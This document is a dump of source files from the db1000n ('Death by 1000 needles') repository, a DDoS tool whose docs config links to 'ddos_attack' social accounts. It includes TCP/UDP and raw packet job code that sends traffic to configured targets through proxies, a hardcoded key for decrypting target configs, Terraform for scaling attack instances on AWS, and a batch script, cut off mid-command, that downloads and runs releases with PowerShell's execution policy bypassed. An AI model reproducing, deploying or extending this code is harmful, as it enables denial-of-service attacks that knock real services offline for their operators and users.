"volume_type" { 57 | description = "The type of volume. Can be `standard`, `gp2`, or `io1`." 58 | default = "gp2" 59 | } 60 | 61 | variable "volume_size" { 62 | description = "The size of the volume in gigabytes." 63 | default = "20" 64 | } 65 | 66 | variable "encrypted" { 67 | description = "Enables EBS encryption on the volume." 68 | default = true 69 | } 70 | 71 | variable "desired_capacity" { 72 | description = "The number of Amazon EC2 instances that should be running in the auto scale group" 73 | } 74 | 75 | variable "max_size" { 76 | description = "The maximum size of the auto scale group" 77 | } 78 | 79 | variable "min_size" { 80 | description = "The minimum size of the auto scale group" 81 | } 82 | 83 | variable "on_demand_base_capacity" { 84 | description = "Auto Scalling Group value for desired capacity for instance lifecycle type on-demand of bastion hosts." 85 | default = 0 86 | } 87 | 88 | variable "use_spot_instances" { 89 | description = "Use spot instances or on-demand" 90 | default = false 91 | } 92 | 93 | variable "spot_overrides" { 94 | description = "Instance type overrides. Only applicable with spot instances" 95 | type = list(object({ 96 | instance_type = string 97 | weighted_capacity = number 98 | })) 99 | default = [] 100 | } 101 | 102 | variable "termination_policies" { 103 | type = list(string) 104 | description = "A list of policies to decide how the instances in the auto scale group should be terminated. The allowed values are OldestInstance, NewestInstance, OldestLaunchConfiguration, ClosestToNextInstanceHour, OldestLaunchTemplate, AllocationStrategy." 105 | default = ["OldestInstance"] 106 | } -------------------------------------------------------------------------------- /src/utils/metrics/reporter.go: -------------------------------------------------------------------------------- 1 | package metrics 2 | 3 | import ( 4 | "bufio" 5 | "fmt" 6 | "io" 7 | "text/tabwriter" 8 | 9 | "go.uber.org/zap" 10 | ) 11 | 12 | // Reporter gathers metrics across jobs and reports them. 13 | // Concurrency-safe. 14 | type Reporter interface { 15 | // WriteSummary dumps Reporter contents into the target. 16 | WriteSummary(*StatsTracker) 17 | } 18 | 19 | // ZapReporter 20 | 21 | type ZapReporter struct { 22 | logger *zap.Logger 23 | groupTargets bool 24 | } 25 | 26 | // NewZapReporter creates a new Reporter using a zap logger. 27 | func NewZapReporter(logger *zap.Logger, groupTargets bool) Reporter { 28 | return &ZapReporter{logger: logger, groupTargets: groupTargets} 29 | } 30 | 31 | func (r *ZapReporter) WriteSummary(tracker *StatsTracker) { 32 | stats, totals, statsInterval, totalsInterval := tracker.sumStats(r.groupTargets) 33 | 34 | r.logger.Info("stats", zap.Object("total", &totals), zap.Object("targets", stats), 35 | zap.Object("total_since_last_report", &totalsInterval), zap.Object("targets_since_last_report", statsInterval)) 36 | } 37 | 38 | // ConsoleReporter 39 | 40 | type ConsoleReporter struct { 41 | target *bufio.Writer 42 | groupTargets bool 43 | } 44 | 45 | // NewConsoleReporter creates a new Reporter which outputs straight to the console 46 | func NewConsoleReporter(target io.Writer, groupTargets bool) Reporter { 47 | return &ConsoleReporter{target: bufio.NewWriter(target), groupTargets: groupTargets} 48 | } 49 | 50 | func (r *ConsoleReporter) WriteSummary(tracker *StatsTracker) { 51 | writer := tabwriter.NewWriter(r.target, 1, 1, 1, ' ', tabwriter.AlignRight) 52 | 53 | r.writeSummaryTo(tracker, writer) 54 | 55 | // Important to flush the remains of bufio.Writer 56 | r.target.Flush() 57 | } 58 | 59 | func (r *ConsoleReporter) writeSummaryTo(tracker *StatsTracker, writer *tabwriter.Writer) { 60 | stats, totals, statsInterval, totalsInterval := tracker.sumStats(r.groupTargets) 61 | 62 | defer writer.Flush() 63 | 64 | // Print table's header 65 | fmt.Fprintln(writer, "\n --- Traffic stats ---") 66 | fmt.Fprintf(writer, "|\tTarget\t|\tRequests attempted\t|\tRequests sent\t|\tResponses received\t|\tData sent\t|\tData received \t|\n") 67 | 68 | // Print all table rows 69 | for _, tgt := range stats.sortedTargets() { 70 | printStatsRow(writer, tgt, stats[tgt], statsInterval[tgt]) 71 | } 72 | 73 | // Print table's footer 74 | fmt.Fprintln(writer, "|\t---\t|\t---\t|\t---\t|\t---\t|\t---\t|\t--- \t|") 75 | printStatsRow(writer, "Total", totals, totalsInterval) 76 | fmt.Fprintln(writer) 77 | } 78 | 79 | func printStatsRow(writer *tabwriter.Writer, rowName string, stats Stats, diff Stats) { 80 | const BytesInMegabyte = 1024 * 1024 81 | 82 | fmt.Fprintf(writer, "|\t%s\t|\t%d/%d\t|\t%d/%d\t|\t%d/%d\t|\t%.2f MB/%.2f MB\t|\t%.2f MB/%.2f MB \t|\n", rowName, 83 | diff[RequestsAttemptedStat], stats[RequestsAttemptedStat], 84 | diff[RequestsSentStat], stats[RequestsSentStat], 85 | diff[ResponsesReceivedStat], stats[ResponsesReceivedStat], 86 | float64(diff[BytesSentStat])/BytesInMegabyte, float64(stats[BytesSentStat])/BytesInMegabyte, 87 | float64(diff[BytesReceivedStat])/BytesInMegabyte, float64(stats[BytesReceivedStat])/BytesInMegabyte, 88 | ) 89 | } 90 | -------------------------------------------------------------------------------- /src/utils/crypto.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "bytes" 5 | "io" 6 | "runtime" 7 | "strings" 8 | "sync" 9 | 10 | "filippo.io/age" 11 | ) 12 | 13 | // EncryptionKeys random 32 byte key encoded into base64 string. Used by default for configs 14 | var EncryptionKeys = `/45pB920B6DFNwCB/n4rYUio3AVMawrdtrFnjTSIzL4=` 15 | 16 | var ProtectedKeys = `` 17 | 18 | // decryption takes a bunch of RAM to generate scrypt identity 19 | // we don't do decryption in hot paths so it's better to only allow one thread doing decryption at a time to avoi OOM 20 | var decryptMutex sync.Mutex 21 | 22 | const ( 23 | encryptionKeyEnvName = `ENCRYPTION_KEYS` 24 | keySeparator = `&` 25 | ) 26 | 27 | type encryptionKey struct { 28 | key string 29 | protected bool // indicates that the content encrypted by this key shouldn't be logged anywhere 30 | } 31 | 32 | // getEncryptionKeys returns list of encryption keys from ENCRYPTION_KEYS env variable name or default value 33 | func getEncryptionKeys() []encryptionKey { 34 | keysString := GetEnvStringDefault(encryptionKeyEnvName, EncryptionKeys) 35 | if keysString != EncryptionKeys { 36 | // if user specified own keys, add default at end to be sure that it always used too 37 | // to avoid manual copy/join default key to new 38 | keysString = keysString + keySeparator + EncryptionKeys 39 | } 40 | 41 | // +1 to allocate for case if no separator and list contains key itself 42 | // otherwise we just allocate +1 struct for string slice that stores just 2 int fields 43 | // that is not a lot 44 | output := make([]encryptionKey, 0, strings.Count(keysString, keySeparator)+strings.Count(ProtectedKeys, keySeparator)+1) 45 | 46 | for _, key := range strings.Split(keysString, keySeparator) { 47 | if key != "" { 48 | output = append(output, encryptionKey{key: key}) 49 | } 50 | } 51 | 52 | for _, key := range strings.Split(ProtectedKeys, keySeparator) { 53 | if key != "" { 54 | output = append(output, encryptionKey{key: key, protected: true}) 55 | } 56 | } 57 | 58 | return output 59 | } 60 | 61 | // IsEncrypted returns true if cfg encrypted with age tool (https://github.com/FiloSottile/age) 62 | func IsEncrypted(cfg []byte) bool { 63 | return bytes.Contains(cfg, []byte(`age-encryption`)) 64 | } 65 | 66 | // Decrypt decrypts config using EncryptionKeys 67 | func Decrypt(cfg []byte) (result []byte, protected bool, err error) { 68 | decryptMutex.Lock() 69 | defer decryptMutex.Unlock() 70 | 71 | // iterate over all keys and return on first success decryption 72 | for _, key := range getEncryptionKeys() { 73 | result, err = decrypt(cfg, key.key) 74 | 75 | runtime.GC() // force GC to decrease memory usage 76 | 77 | if err != nil { 78 | continue 79 | } 80 | 81 | return result, key.protected, nil 82 | } 83 | 84 | return nil, false, err 85 | } 86 | 87 | func decrypt(cfg []byte, key string) ([]byte, error) { 88 | identity, err := age.NewScryptIdentity(key) 89 | if err != nil { 90 | return nil, err 91 | } 92 | 93 | decryptedReader, err := age.Decrypt(bytes.NewReader(cfg), identity) 94 | if err != nil { 95 | return nil, err 96 | } 97 | 98 | return io.ReadAll(decryptedReader) 99 | } 100 | -------------------------------------------------------------------------------- /src/utils/metrics/metrics.go: -------------------------------------------------------------------------------- 1 | // MIT License 2 | 3 | // Copyright (c) [2022] [Bohdan Ivashko (https://github.com/Arriven)] 4 | 5 | // Permission is hereby granted, free of charge, to any person obtaining a copy 6 | // of this software and associated documentation files (the "Software"), to deal 7 | // in the Software without restriction, including without limitation the rights 8 | // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | // copies of the Software, and to permit persons to whom the Software is 10 | // furnished to do so, subject to the following conditions: 11 | 12 | // The above copyright notice and this permission notice shall be included in all 13 | // copies or substantial portions of the Software. 14 | 15 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | // SOFTWARE. 22 | 23 | // Package metrics collects and reports job metrics. 24 | package metrics 25 | 26 | import ( 27 | "strings" 28 | "sync" 29 | ) 30 | 31 | type Metrics [NumStats]sync.Map // Array of metrics by Stat. Each metric is a map of uint64 values by dimensions. 32 | 33 | // NewAccumulator returns a new metrics Accumulator for the Reporter. 34 | func (m *Metrics) NewAccumulator(jobID string) *Accumulator { 35 | if m == nil { 36 | return nil 37 | } 38 | 39 | return newAccumulator(jobID, m) 40 | } 41 | 42 | // Calculates all targets and total stats 43 | func (m *Metrics) SumAllStats(groupTargets bool) (stats PerTargetStats, totals Stats) { 44 | stats = m.sumAllStatsByTarget(groupTargets) 45 | 46 | for s := RequestsAttemptedStat; s < NumStats; s++ { 47 | totals[s] = m.Sum(s) 48 | } 49 | 50 | return 51 | } 52 | 53 | // Sum returns a total sum of metric s. 54 | func (m *Metrics) Sum(s Stat) uint64 { 55 | var res uint64 56 | 57 | m[s].Range(func(_, v any) bool { 58 | value, ok := v.(uint64) 59 | if !ok { 60 | return true 61 | } 62 | 63 | res += value 64 | 65 | return true 66 | }) 67 | 68 | return res 69 | } 70 | 71 | // Returns a total sum of all metrics by target. 72 | func (m *Metrics) sumAllStatsByTarget(groupTargets bool) PerTargetStats { 73 | res := make(PerTargetStats) 74 | 75 | for s := RequestsAttemptedStat; s < NumStats; s++ { 76 | m[s].Range(func(k, v any) bool { 77 | d, ok := k.(dimensions) 78 | if !ok { 79 | return true 80 | } 81 | 82 | value, ok := v.(uint64) 83 | if !ok { 84 | return true 85 | } 86 | 87 | var target string 88 | if groupTargets { 89 | protocol, _, found := strings.Cut(d.target, "://") 90 | if found { 91 | target = protocol 92 | } else { 93 | target = "other" 94 | } 95 | } else { 96 | target = d.target 97 | } 98 | 99 | stats := res[target] 100 | stats[s] += value 101 | res[target] = stats 102 | 103 | return true 104 | }) 105 | } 106 | 107 | return res 108 | } 109 | -------------------------------------------------------------------------------- /mkdocs.yml: -------------------------------------------------------------------------------- 1 | # yaml-language-server: $schema=https://squidfunk.github.io/mkdocs-material/schema.json 2 | 3 | site_name: Death by 1000 needles 4 | 5 | site_url: https://arriven.github.io/db1000n 6 | 7 | repo_url: https://github.com/Arriven/db1000n 8 | 9 | repo_name: Arriven/db1000n 10 | 11 | copyright: Copyright © 2022 Arriven 12 | 13 | theme: 14 | name: material 15 | icon: 16 | repo: fontawesome/brands/github 17 | features: 18 | - search.suggest 19 | - search.highlight 20 | - search.share 21 | - navigation.tracking 22 | - navigation.expand 23 | - navigation.top 24 | palette: 25 | - media: "(prefers-color-scheme: light)" 26 | scheme: default 27 | primary: blue 28 | accent: red 29 | toggle: 30 | icon: material/lightbulb 31 | name: Switch to dark mode 32 | - media: "(prefers-color-scheme: dark)" 33 | scheme: slate 34 | primary: yellow 35 | accent: red 36 | toggle: 37 | icon: material/lightbulb-outline 38 | name: Switch to light mode 39 | 40 | markdown_extensions: 41 | - mdx_truly_sane_lists 42 | - pymdownx.emoji: 43 | emoji_index: !!python/name:materialx.emoji.twemoji 44 | emoji_generator: !!python/name:materialx.emoji.to_svg 45 | - pymdownx.critic 46 | - pymdownx.caret 47 | - pymdownx.mark 48 | - pymdownx.tilde 49 | - pymdownx.tabbed 50 | - attr_list 51 | - pymdownx.arithmatex: 52 | generic: true 53 | - pymdownx.highlight: 54 | linenums: false 55 | - pymdownx.superfences 56 | - pymdownx.inlinehilite 57 | - pymdownx.details 58 | - admonition 59 | - toc: 60 | baselevel: 2 61 | permalink: true 62 | slugify: !!python/name:pymdownx.slugs.uslugify 63 | - meta 64 | 65 | plugins: 66 | - include-markdown 67 | - git-tag 68 | - search: 69 | lang: 70 | - en 71 | - ru 72 | - i18n: 73 | default_language: en 74 | material_alternate: true 75 | languages: 76 | default: 77 | name: Default (en) 78 | build: true 79 | en: 80 | name: English 81 | build: true 82 | uk: 83 | name: Українська 84 | build: true 85 | nav_translations: 86 | en: 87 | Home: Quick start 88 | Index: Quick start 89 | Aws: AWS 90 | Gcp: GCP 91 | uk: 92 | Index: Швидкий старт 93 | Faq: Часті питання 94 | License: Ліцензія 95 | Aws: AWS 96 | Gcp: GCP 97 | 98 | extra: 99 | social: 100 | - icon: fontawesome/brands/github 101 | link: https://github.com/Arriven/db1000n 102 | name: GitHub repo 103 | - icon: fontawesome/brands/telegram 104 | link: https://t.me/ddos_separ 105 | name: Telegram group 106 | - icon: fontawesome/brands/instagram 107 | link: https://instagram.com/ddos_attack_separ 108 | name: Instagram 109 | - icon: fontawesome/brands/facebook 110 | link: https://www.facebook.com/ddos.attack.separ 111 | name: Facebook 112 | alternate: 113 | - name: default 114 | link: ./ 115 | lang: en 116 | - name: English 117 | link: ./en/ 118 | lang: en 119 | - name: Українська 120 | link: ./uk/ 121 | lang: uk 122 | -------------------------------------------------------------------------------- /src/core/packetgen/network.go: -------------------------------------------------------------------------------- 1 | // MIT License 2 | 3 | // Copyright (c) [2022] [Bohdan Ivashko (https://github.com/Arriven)] 4 | 5 | // Permission is hereby granted, free of charge, to any person obtaining a copy 6 | // of this software and associated documentation files (the "Software"), to deal 7 | // in the Software without restriction, including without limitation the rights 8 | // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | // copies of the Software, and to permit persons to whom the Software is 10 | // furnished to do so, subject to the following conditions: 11 | 12 | // The above copyright notice and this permission notice shall be included in all 13 | // copies or substantial portions of the Software. 14 | 15 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | // SOFTWARE. 22 | 23 | package packetgen 24 | 25 | import ( 26 | "fmt" 27 | "net" 28 | 29 | "github.com/google/gopacket" 30 | "github.com/google/gopacket/layers" 31 | 32 | "github.com/Arriven/db1000n/src/utils" 33 | ) 34 | 35 | func BuildNetworkLayer(c LayerConfig) (gopacket.NetworkLayer, error) { 36 | switch c.Type { 37 | case "": 38 | return nil, nil 39 | case "ipv4": 40 | var packetConfig IPPacketConfig 41 | if err := utils.Decode(c.Data, &packetConfig); err != nil { 42 | return nil, err 43 | } 44 | 45 | return buildIPV4Packet(packetConfig), nil 46 | case "ipv6": 47 | var packetConfig IPPacketConfig 48 | if err := utils.Decode(c.Data, &packetConfig); err != nil { 49 | return nil, err 50 | } 51 | 52 | return buildIPV6Packet(packetConfig), nil 53 | default: 54 | return nil, fmt.Errorf("unsupported network layer type %s", c.Type) 55 | } 56 | } 57 | 58 | // IPPacketConfig describes ip layer configuration 59 | type IPPacketConfig struct { 60 | SrcIP string 61 | DstIP string 62 | NextProtocol *int 63 | TTL uint8 64 | } 65 | 66 | // buildIPV4Packet generates a layers.IPv4 and returns it with source IP address and destination IP address 67 | func buildIPV4Packet(c IPPacketConfig) *layers.IPv4 { 68 | const ipv4 = 4 69 | 70 | next := layers.IPProtocolTCP 71 | if c.NextProtocol != nil { 72 | next = layers.IPProtocol(*c.NextProtocol) 73 | } 74 | 75 | return &layers.IPv4{ 76 | SrcIP: net.ParseIP(c.SrcIP).To4(), 77 | DstIP: net.ParseIP(c.DstIP).To4(), 78 | Version: ipv4, 79 | Protocol: next, 80 | TTL: c.TTL, 81 | } 82 | } 83 | 84 | // buildIPV6Packet generates a layers.IPv6 and returns it with source IP address and destination IP address 85 | func buildIPV6Packet(c IPPacketConfig) *layers.IPv6 { 86 | const ipv6 = 6 87 | 88 | next := layers.IPProtocolTCP 89 | if c.NextProtocol != nil { 90 | next = layers.IPProtocol(*c.NextProtocol) 91 | } 92 | 93 | return &layers.IPv6{ 94 | SrcIP: net.ParseIP(c.SrcIP).To16(), 95 | DstIP: net.ParseIP(c.DstIP).To16(), 96 | Version: ipv6, 97 | NextHeader: next, 98 | } 99 | } 100 | -------------------------------------------------------------------------------- /src/job/rawnet.go: -------------------------------------------------------------------------------- 1 | // MIT License 2 | 3 | // Copyright (c) [2022] [Bohdan Ivashko (https://github.com/Arriven)] 4 | 5 | // Permission is hereby granted, free of charge, to any person obtaining a copy 6 | // of this software and associated documentation files (the "Software"), to deal 7 | // in the Software without restriction, including without limitation the rights 8 | // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | // copies of the Software, and to permit persons to whom the Software is 10 | // furnished to do so, subject to the following conditions: 11 | 12 | // The above copyright notice and this permission notice shall be included in all 13 | // copies or substantial portions of the Software. 14 | 15 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | // SOFTWARE. 22 | 23 | package job 24 | 25 | import ( 26 | "context" 27 | "fmt" 28 | "time" 29 | 30 | "go.uber.org/zap" 31 | 32 | "github.com/Arriven/db1000n/src/job/config" 33 | "github.com/Arriven/db1000n/src/utils/metrics" 34 | ) 35 | 36 | // "tcp" in config 37 | func tcpJob(ctx context.Context, args config.Args, globalConfig *GlobalConfig, a *metrics.Accumulator, logger *zap.Logger) (data any, err error) { 38 | return rawnetJob(ctx, "tcp", args, globalConfig, a, logger) 39 | } 40 | 41 | // "udp" in config 42 | func udpJob(ctx context.Context, args config.Args, globalConfig *GlobalConfig, a *metrics.Accumulator, logger *zap.Logger) (data any, err error) { 43 | return rawnetJob(ctx, "udp", args, globalConfig, a, logger) 44 | } 45 | 46 | func rawnetJob(ctx context.Context, protocol string, args config.Args, globalConfig *GlobalConfig, a *metrics.Accumulator, logger *zap.Logger) ( 47 | data any, err error, 48 | ) { 49 | packetgenArgs, err := parseRawNetJobArgs(globalConfig, args, protocol) 50 | if err != nil { 51 | return nil, err 52 | } 53 | 54 | return packetgenJob(ctx, packetgenArgs, globalConfig, a, logger) 55 | } 56 | 57 | func parseRawNetJobArgs(globalConfig *GlobalConfig, args config.Args, protocol string) ( 58 | result map[string]any, err error, 59 | ) { 60 | var jobConfig struct { 61 | BasicJobConfig 62 | 63 | Address string 64 | Body string 65 | ProxyURLs string 66 | Timeout *time.Duration 67 | } 68 | 69 | if err := ParseConfig(&jobConfig, args, *globalConfig); err != nil { 70 | return nil, fmt.Errorf("error decoding rawnet job config: %w", err) 71 | } 72 | 73 | packetgenArgs := make(map[string]any) 74 | for k, v := range args { 75 | packetgenArgs[k] = v 76 | } 77 | 78 | packetgenArgs["connection"] = map[string]any{ 79 | "type": "net", 80 | "args": map[string]any{ 81 | "protocol": protocol, 82 | "address": jobConfig.Address, 83 | "timeout": jobConfig.Timeout, 84 | "proxy_urls": jobConfig.ProxyURLs, 85 | }, 86 | } 87 | packetgenArgs["packet"] = map[string]any{ 88 | "payload": map[string]any{ 89 | "type": "raw", 90 | "data": map[string]any{ 91 | "payload": jobConfig.Body, 92 | }, 93 | }, 94 | } 95 | 96 | return packetgenArgs, nil 97 | } 98 | -------------------------------------------------------------------------------- /src/utils/templates/encoding.go: -------------------------------------------------------------------------------- 1 | package templates 2 | 3 | import ( 4 | "encoding/json" 5 | "strings" 6 | 7 | "gopkg.in/yaml.v3" 8 | 9 | "github.com/Arriven/db1000n/src/utils" 10 | ) 11 | 12 | // toYAML takes an interface, marshals it to yaml, and returns a string. It will 13 | // always return a string, even on marshal error (empty string). 14 | // 15 | // This is designed to be called from a template. 16 | func toYAML(v any) string { 17 | data, err := yaml.Marshal(v) 18 | if err != nil { 19 | // Swallow errors inside of a template. 20 | return "" 21 | } 22 | 23 | return strings.TrimSuffix(string(data), "\n") 24 | } 25 | 26 | // fromYAML converts a YAML document into a map[string]any. 27 | // 28 | // This is not a general-purpose YAML parser, and will not parse all valid 29 | // YAML documents. Additionally, because its intended use is within templates 30 | // it tolerates errors. It will insert the returned error message string into 31 | // m["Error"] in the returned map. 32 | func fromYAML(str string) map[string]any { 33 | m := map[string]any{} 34 | if err := utils.Unmarshal([]byte(str), &m, "yaml"); err != nil { 35 | m["Error"] = err.Error() 36 | } 37 | 38 | return m 39 | } 40 | 41 | // fromYAMLArray converts a YAML array into a []any. 42 | // 43 | // This is not a general-purpose YAML parser, and will not parse all valid 44 | // YAML documents. Additionally, because its intended use is within templates 45 | // it tolerates errors. It will insert the returned error message string as 46 | // the first and only item in the returned array. 47 | func fromYAMLArray(str string) []any { 48 | a := []any{} 49 | if err := utils.Unmarshal([]byte(str), &a, "yaml"); err != nil { 50 | a = []any{err.Error()} 51 | } 52 | 53 | return a 54 | } 55 | 56 | // toJSON takes an interface, marshals it to json, and returns a string. It will 57 | // always return a string, even on marshal error (empty string). 58 | // 59 | // This is designed to be called from a template. 60 | func toJSON(v any) string { 61 | data, err := json.Marshal(v) 62 | if err != nil { 63 | // Swallow errors inside of a template. 64 | return "" 65 | } 66 | 67 | return string(data) 68 | } 69 | 70 | // fromJSON converts a JSON document into a map[string]any. 71 | // 72 | // This is not a general-purpose JSON parser, and will not parse all valid 73 | // JSON documents. Additionally, because its intended use is within templates 74 | // it tolerates errors. It will insert the returned error message string into 75 | // m["Error"] in the returned map. 76 | func fromJSON(str string) map[string]any { 77 | m := make(map[string]any) 78 | if err := utils.Unmarshal([]byte(str), &m, "json"); err != nil { 79 | m["Error"] = err.Error() 80 | } 81 | 82 | return m 83 | } 84 | 85 | // fromJSONArray converts a JSON array into a []any. 86 | // 87 | // This is not a general-purpose JSON parser, and will not parse all valid 88 | // JSON documents. Additionally, because its intended use is within templates 89 | // it tolerates errors. It will insert the returned error message string as 90 | // the first and only item in the returned array. 91 | func fromJSONArray(str string) []any { 92 | a := []any{} 93 | if err := utils.Unmarshal([]byte(str), &a, "json"); err != nil { 94 | a = []any{err.Error()} 95 | } 96 | 97 | return a 98 | } 99 | 100 | func fromStringArray(str string) []string { 101 | a := []string{} 102 | if err := utils.Unmarshal([]byte(str), &a, "yaml"); err != nil { 103 | a = []string{err.Error()} 104 | } 105 | 106 | return a 107 | } 108 | -------------------------------------------------------------------------------- /terraform/aws_eks/modules/network/main.tf: -------------------------------------------------------------------------------- 1 | # Create VPC 2 | resource "aws_vpc" "vpc" { 3 | cidr_block = var.vpc_cidr_block 4 | enable_dns_support = true 5 | enable_dns_hostnames = true 6 | 7 | 8 | tags = merge( 9 | { 10 | Name = "${var.name}" 11 | }, 12 | var.tags 13 | ) 14 | } 15 | 16 | # Create Internet gateway (associated with public subnets) 17 | resource "aws_internet_gateway" "internetgw" { 18 | vpc_id = aws_vpc.vpc.id 19 | 20 | 21 | tags = { 22 | Name = "${var.name}-internetgw" 23 | } 24 | } 25 | 26 | # Create elastic IPs (associated with NAT gateways) 27 | resource "aws_eip" "natgw" { 28 | count = var.amount_az 29 | vpc = true 30 | 31 | depends_on = [aws_internet_gateway.internetgw] 32 | } 33 | 34 | # Create NAT gateway (for each AZ) 35 | resource "aws_nat_gateway" "natgw" { 36 | count = var.amount_az 37 | allocation_id = aws_eip.natgw[count.index].id 38 | subnet_id = aws_subnet.public[count.index].id 39 | 40 | 41 | tags = { 42 | Name = "${var.name}-natgw-${data.aws_availability_zones.available.names[count.index]}" 43 | } 44 | 45 | depends_on = [aws_internet_gateway.internetgw] 46 | } 47 | 48 | # Create public subnets 49 | resource "aws_subnet" "public" { 50 | count = var.amount_az 51 | vpc_id = aws_vpc.vpc.id 52 | availability_zone = data.aws_availability_zones.available.names[count.index] 53 | cidr_block = cidrsubnet(var.vpc_cidr_block, 8, count.index + 1) 54 | map_public_ip_on_launch = true 55 | 56 | 57 | tags = merge( 58 | { 59 | "kubernetes.io/role/elb" = 1 60 | }, 61 | var.tags 62 | ) 63 | } 64 | 65 | # Create private subnets 66 | resource "aws_subnet" "private" { 67 | count = var.amount_az 68 | vpc_id = aws_vpc.vpc.id 69 | availability_zone = data.aws_availability_zones.available.names[count.index] 70 | cidr_block = cidrsubnet(var.vpc_cidr_block, 8, count.index + 3) 71 | 72 | 73 | tags = merge( 74 | { 75 | "kubernetes.io/role/internal-elb" = 1 76 | }, 77 | var.tags 78 | ) 79 | } 80 | 81 | # Create Internet gateway route table 82 | resource "aws_route_table" "internetgw" { 83 | vpc_id = aws_vpc.vpc.id 84 | 85 | route { 86 | cidr_block = "0.0.0.0/0" 87 | gateway_id = aws_internet_gateway.internetgw.id 88 | } 89 | 90 | 91 | tags = { 92 | Name = "${var.name}-internetgw" 93 | } 94 | } 95 | 96 | # Create NAT gateway route table (one for each a-z) 97 | resource "aws_route_table" "natgw" { 98 | count = var.amount_az 99 | vpc_id = aws_vpc.vpc.id 100 | 101 | route { 102 | cidr_block = "0.0.0.0/0" 103 | nat_gateway_id = aws_nat_gateway.natgw[count.index].id 104 | } 105 | 106 | 107 | tags = { 108 | Name = "${var.name}-natgw-${data.aws_availability_zones.available.names[count.index]}" 109 | } 110 | } 111 | 112 | # Create Internet gateway route table association (associated with public subnets) 113 | resource "aws_route_table_association" "internetgw" { 114 | count = var.amount_az 115 | subnet_id = aws_subnet.public[count.index].id 116 | route_table_id = aws_route_table.internetgw.id 117 | } 118 | 119 | # Create NAT gateway route table association (associated with private subnets) 120 | resource "aws_route_table_association" "natgw" { 121 | count = var.amount_az 122 | subnet_id = aws_subnet.private[count.index].id 123 | route_table_id = aws_route_table.natgw[count.index].id 124 | } -------------------------------------------------------------------------------- /scripts/StartDB1000N.bat: -------------------------------------------------------------------------------- 1 | rem First we write PowerShell script to separate file, since it's easier to do download from github with powershell 2 | rem Parsing command line argument to get target download folder 3 | echo $SaveFolder = $args[0] > %temp%\GetDB1000N.ps1 4 | echo if ($args.count -lt 1) >> %temp%\GetDB1000N.ps1 5 | echo { >> %temp%\GetDB1000N.ps1 6 | echo Write-Host "Missing save folder parameter" >> %temp%\GetDB1000N.ps1 7 | echo } >> %temp%\GetDB1000N.ps1 8 | rem Create target folder if it don't exist yet 9 | echo New-Item -ItemType Directory -Force -Path $SaveFolder >> %temp%\GetDB1000N.ps1 10 | rem Getting list of files in latest release via github API and parse response JSON 11 | echo $JSONURL = "https://api.github.com/repos/Arriven/db1000n/releases/latest" >> %temp%\GetDB1000N.ps1 12 | echo $JSON = Invoke-WebRequest -Uri $JSONURL -UseBasicParsing >> %temp%\GetDB1000N.ps1 13 | echo $ParsedJSON = ConvertFrom-Json -InputObject $JSON >> %temp%\GetDB1000N.ps1 14 | echo $Assets = Select-Object -InputObject $ParsedJSON -ExpandProperty assets >> %temp%\GetDB1000N.ps1 15 | rem Iterate over list of all files in release 16 | echo Foreach ($Asset IN $Assets) >> %temp%\GetDB1000N.ps1 17 | echo { >> %temp%\GetDB1000N.ps1 18 | rem Search for windows x64 build with regex 19 | echo if ($Asset.name -match 'db1000n_windows_amd64.zip') >> %temp%\GetDB1000N.ps1 20 | echo { >> %temp%\GetDB1000N.ps1 21 | rem Download found build 22 | echo $DownloadURL = $Asset.browser_download_url >> %temp%\GetDB1000N.ps1 23 | echo $ZIPPath = Join-Path -Path $SaveFolder -ChildPath "db1000n.zip" >> %temp%\GetDB1000N.ps1 24 | echo Invoke-WebRequest -Uri $DownloadURL -OutFile $ZIPPath >> %temp%\GetDB1000N.ps1 25 | rem Extract downloaded archive 26 | echo Expand-Archive -Path $ZIPPath -DestinationPath $SaveFolder -Force >> %temp%\GetDB1000N.ps1 27 | rem Delete original archive file 28 | echo Remove-Item -Path $ZIPPath >> %temp%\GetDB1000N.ps1 29 | echo Write-Host "Sucessfully downloaded DB1000N $($Asset.name)" >> %temp%\GetDB1000N.ps1 30 | echo exit 0 >> %temp%\GetDB1000N.ps1 31 | echo } >> %temp%\GetDB1000N.ps1 32 | echo } >> %temp%\GetDB1000N.ps1 33 | echo Write-Host "Something went wrong, couldn't download DB1000N" >> %temp%\GetDB1000N.ps1 34 | echo exit 1 >> %temp%\GetDB1000N.ps1 35 | 36 | rem Download latest windows x64 build 37 | rem We don't currently check if it's already downloaded, so it redownload latest version each run 38 | powershell -ExecutionPolicy Bypass -File 